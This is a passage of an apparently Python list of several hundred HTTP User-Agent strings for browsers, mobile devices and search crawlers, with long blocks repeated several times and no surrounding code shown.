'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0',
'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g',
'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125',
'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)',
'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)',
'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)',
'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0',
'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10',
'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)',
'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',
'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16',
'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)',
'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7',
'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0',
'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)',
'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)',
'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10',
'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)',
'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007',
'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)',
'Googlebot/2.1 (http://www.googlebot.com/bot.html)', 'Opera/9.20 (Windows NT 6.0; U; en)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061205 Iceweasel/2.0.0.1 (Debian-2.0.0.1+dfsg-2)',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)',
'Opera/10.00 (X11; Linux i686; U; en) Presto/2.2.0',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16',
'Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101209 Firefox/3.6.13',
'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)',
'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)',
'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)', 'Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100804 Gentoo Firefox/3.6.8',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7',
'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',
'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)',
'YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)',
'Mozilla/5.0 (compatible; MSIE 9.0; AOL 9.7; AOLBuild 4343.19; Windows NT 6.1; WOW64; Trident/5.0; FunWebProducts)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.27; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.21; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; GTB7.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57',
'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0',
'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g',
'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125',
'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)',
'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)',
'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)',
'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0',
'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10',
'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)',
'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',
'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16',
'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)',
'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7',
'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0',
'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)',
'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)',
'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10',
'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)',
'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007',
'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57',
'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0',
'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g',
'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125',
'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)',
'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)',
'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)',
'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0',
'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10',
'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)',
'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',
'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16',
'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)',
'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7',
'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0',
'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)',
'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)',
'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10',
'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)',
'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007',
'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179',
'Mozilla/5.0 (compatible; 008/0.83; http://www.80legs.com/webcrawler.html) Gecko/2008032620',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) AddSugarSpiderBot www.idealobserver.com',
'Mozilla/5.0 (compatible; AnyApexBot/1.0; +http://www.anyapex.com/bot.html)',
'Mozilla/4.0 (compatible; Arachmo)', 'Mozilla/4.0 (compatible; B-l-i-t-z-B-O-T)',
'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)',
'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)',
'Mozilla/5.0 (compatible; BecomeBot/2.3; MSIE 6.0 compatible; +http://www.become.com/site_owners.html)',
'BillyBobBot/1.0 (+http://www.billybobbot.com/crawler/)',
'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)',
'Sqworm/2.9.85-BETA (beta_release; 20011115-775; i686-pc-linux-gnu)',
'Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)',
'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)',
'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )',
'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )',
'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.zyborg@looksmart.net; http://www.WISEnutbot.com)',
'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.dlc@looksmart.net; http://www.WISEnutbot.com)',
'Mozilla/4.0 compatible ZyBorg/1.0 (wn-16.zyborg@looksmart.net; http://www.WISEnutbot.com)',
'Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)',
'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser 1.98.744; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; Acoo Browser; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Avant Browser)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.1; .NET CLR 3.5.30729; .NET CLR 3.0.30618)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Acoo Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko, Safari/419.3) Cheshire/1.0.ALPHA',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) ChromePlus/4.0.222.3 Chrome/4.0.222.3 Safari/532.2',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 ChromePlus/1.5.1.1',
'Links (2.7; Linux 3.7.9-2-ARCH x86_64; GNU C 4.7.1; text)',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A',
'Mozilla/5.0 (PLAYSTATION 3; 3.55)', 'Mozilla/5.0 (PLAYSTATION 3; 2.00)',
'Mozilla/5.0 (PLAYSTATION 3; 1.00)',
'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:24.0) Gecko/20100101 Thunderbird/24.4.0',
'Mozilla/5.0 (compatible; AbiLogicBot/1.0; +http://www.abilogic.com/bot.html)',
'SiteBar/3.3.8 (Bookmark Server; http://sitebar.org/)',
'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)',
'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)',
'Mozilla/4.0 (compatible; WebCapture 3.0; Macintosh)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (FM Scene 4.6.1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729) (Prevx 3.0.5) ',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.8) Gecko/20071004 Iceweasel/2.0.0.8 (Debian-2.0.0.6+2.0.0.8-Oetch1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {1C69E7AA-C14E-200E-5A77-8EAB2D667A07})',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; acc=baadshah; acc=none; freenet DSL 1.1; (none))',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.51',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; snprtz|S26320700000083|2600#Service Pack 1#2#5#154321|isdn)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Alexa Toolbar; mxie; .NET CLR 1.1.4322)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; ja-jp) AppleWebKit/417.9 (KHTML, like Gecko) Safari/417.8',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20051010 Firefox/1.0.7 (Ubuntu package 1.0.7)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
